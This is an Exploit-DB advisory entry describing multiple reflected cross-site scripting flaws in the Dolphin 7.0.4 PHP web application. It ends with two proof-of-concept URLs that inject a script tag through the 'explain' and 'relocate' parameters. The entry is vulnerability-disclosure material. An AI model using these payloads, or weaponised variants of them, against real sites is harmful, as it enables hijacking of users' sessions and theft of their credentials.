Dolphin 7.0.4 - Multiple Cross-Site Scripting Vulnerabilities

2011-02-10T00:00:00
ID EDB-ID:35332
Type exploitdb
Reporter AutoSec Tools
Modified 2011-02-10T00:00:00

Description

Dolphin 7.0.4 Multiple Cross Site Scripting Vulnerabilities. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/46337/info

Dolphin is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

Dolphin 7.0.4 is vulnerable; other versions may also be affected. 

http://www.example.com/dolphin/explanation.php?explain=%3Cscript%3Ealert(0)%3C/script%3E 
http://www.example.com/dolphin/modules/boonex/custom_rss/post_mod_crss.php?relocate=%22%3E%3Cscript%3Ealert(0)%3C/script%3E